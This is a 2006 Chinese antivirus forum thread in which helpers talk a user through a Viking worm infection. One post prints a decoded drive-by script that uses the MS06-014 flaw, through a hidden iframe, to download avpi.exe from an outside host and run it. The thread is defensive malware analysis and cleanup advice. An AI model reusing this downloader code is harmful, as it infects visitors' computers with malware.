瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛【求助】大虾们帮忙啊~~~~~

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

2 / 3 页

跳转页

【求助】大虾们帮忙啊~~~~~

轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:	发表于： 2006-12-14 19:30 \| 短消息资料字号：小中大 11楼楼主给的网页，进入后跳转到default.htm，下方有： <iframe src="http://mail.down988.cn/bill/index.htm" width="0" height="0" frameborder="0"></iframe> 此index.htm的内容： <script language=javascript src=http://mail.down988.cn/bill/test.js></script> <script language="javascript" src="http://ww1.tongji123.com/t1.aspx?id=11907117"></script> 下面那段是流量统计，而上面的test.js，是经加密的代码，还原后如下： function gn(n) { var number = Math.random()n; return '~tmp'+Math.round(number)+'.exe'; } try { dl='http://mail.down988.cn/get/avpi.exe'; var df=document.createElement("object*"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; } 利用MS06-014漏洞，下载http://mail.down988.cn/get/avpi.exe到本机此avpi.exe，viking变种，瑞星最新版本尚不能查杀。正在验证置顶帖提供的专杀的最新病毒库是否能查杀。
轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:

就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:	发表于： 2006-12-14 19:56 \| 只看楼主短消息资料字号：小中大 12楼崩溃中~~刚才用卡卡上网助手上提供的专杀工具杀了一下，一个毒都没有找到，不过可以肯定的是文件数一定不对，正常应该是将近10W个文件，但是刚才之有5W多，杀毒的过程中监控中心杀了几个（绝对不超过10个）。。。。杀完以后c盘的根目录下还是有desktop.ini这个文件。。。。。其他.EXE的图标还是白框~~~~ 是不是可以说我的杀毒失败了？？附件: 文件名:80406220061214194835.JPG 下载次数:161 文件类型:image/pjpeg 文件大小: 上传时间:2006-12-14 19:56:19 描述:
就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:

就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:	发表于： 2006-12-14 20:30 \| 只看楼主短消息资料字号：小中大 13楼不要沉了，帮帮我~~ 不行的话今天晚上通宵做机器~~
就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:

就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:	发表于： 2006-12-14 21:03 \| 只看楼主短消息资料字号：小中大 14楼我顶到10点，不行的话就重做~~大家体谅我一下
就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:

轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:	发表于： 2006-12-14 21:09 \| 短消息资料字号：小中大 15楼刚将样本交给mopery，农夫的威金专杀病毒库已更新。 http://mopery.hits.io/viking.zip 下载此压缩包，把整个解压后双击运行VIKING杀虫剂.com，点“在线升级”，如果防火墙提示访问网络则点允许，升级完成之后病毒库应为175个以上，再点“全盘扫描”
轩辕小聪卡卡技术团队帖子:8368 注册: 2006-01-09 来自:

就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:	发表于： 2006-12-14 21:37 \| 只看楼主短消息资料字号：小中大 16楼这些无法访问是什么意思？不是病毒？还是成功或失败了？附件: 文件名:80406220061214212913.JPG 下载次数:192 文件类型:image/pjpeg 文件大小: 上传时间:2006-12-14 21:37:30 描述:
就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:

红夜鬼1 横据古稀狮帖子:8602 注册: 2006-10-18 来自:	发表于： 2006-12-14 21:42 \| 短消息资料字号：小中大 17楼你有没有在线升级
红夜鬼1 横据古稀狮帖子:8602 注册: 2006-10-18 来自:

就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:	发表于： 2006-12-14 21:52 \| 只看楼主短消息资料字号：小中大 18楼升级了，而且还点了好几次，每次都可以升级，没有提示已经是最新版本~~上面的日期也是今天的啊~~
就是个菜鸟初生襁褓狮帖子:17 注册: 2006-12-14 来自:

红夜鬼1 横据古稀狮帖子:8602 注册: 2006-10-18 来自:	发表于： 2006-12-14 21:54 \| 短消息资料字号：小中大 19楼 C:\WINDOWS\logo1_.exe看看有没有这个,没有就好了
红夜鬼1 横据古稀狮帖子:8602 注册: 2006-10-18 来自:

大版主

帖子:72578
注册: 2003-04-10
来自:

年度优秀版主奖

端午辟邪香囊

卡卡名人堂

就爱不长大

论坛9周年纪念

09欢乐圣诞

十周年

年度风云人物

2012我眼中的你们

茶馆劳模

瑞星金牌用户

十一周年勋章

发表于： 2006-12-14 21:55 | 短消息资料

字号：小中大 20楼

引用:

【轩辕小聪的贴子】
此avpi.exe，viking变种，瑞星最新版本尚不能查杀。正在验证置顶帖提供的专杀的最新病毒库是否能查杀。
………………

这个威金还算手下留情的。只删除ghost.exe和ghostExp.exe，没动GHO文件。

附件:

文件名:15584720061214214644.jpg

下载次数:92

文件类型:image/pjpeg

文件大小:

上传时间:2006-12-14 21:55:39

描述:

预览信息:EXIF信息
User Comment : LEAD Technologies Inc. V1.01

gototop

<<上一主题|下一主题>>

2 / 3 页

跳转页

页面顶部

Powered by Discuz!NT